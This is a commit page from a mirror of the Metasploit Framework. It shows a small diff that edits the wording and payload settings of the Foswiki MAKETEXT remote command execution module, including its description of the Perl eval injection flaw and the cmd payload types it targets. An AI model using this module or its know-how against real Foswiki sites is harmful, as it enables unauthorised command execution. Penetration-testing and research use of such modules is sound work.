infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Small corrections

unstable
sinn3r 2012-12-21 18:52:40 -06:00
parent 395a20ef22
commit 9af8c9b457
1 changed files with 10 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
modules/exploits/unix/webapp/foswiki_maketext.rb
View File

@ -16,18 +16,17 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Foswiki MAKETEXT Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability in the MAKETEXT Foswiki variable. Using a
specially crafted MAKETEXT, a malicious user can execute shell commands since user
This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using
a specially crafted MAKETEXT, a malicious user can execute shell commands since the
input is passed to the Perl "eval" command without first being sanitized. The
problem is caused by an underlying security issue in the CPAN:Locale::Maketext
module. This works in Foswiki sites that have user interface localization enabled
(UserInterfaceInternationalisation variable set).
module. Only Foswiki sites that have user interface localization enabled
(UserInterfaceInternationalisation variable set) are vulnerable.
If USERNAME and PASSWORD credentials aren't provided anonymous access will be
intended. On the other hand, if the FoswikiPage option isn't provided, the module
will try to create a random page on the SandBox space. The modules has been tested
successfully on Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware
virtual machine.
If USERNAME and PASSWORD aren't provided, anonymous access will be tried.
Also, if the FoswikiPage option isn't provided, the module will try to create a
random page on the SandBox space. The modules has been tested successfully on
Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.
},
'Author' =>
[
@ -45,12 +44,11 @@ class Metasploit3 < Msf::Exploit::Remote
'Payload' =>
{
'DisableNops' => true,
'BadChars' => '',
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic ruby python bash telnet',
'RequiredCmd' => 'generic ruby python bash telnet'
}
},
'Platform' => [ 'unix' ],
@ -80,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/
print_status "#{res.code}\n#{res.body}"
vprint_status "#{res.code}\n#{res.body}"
return nil
end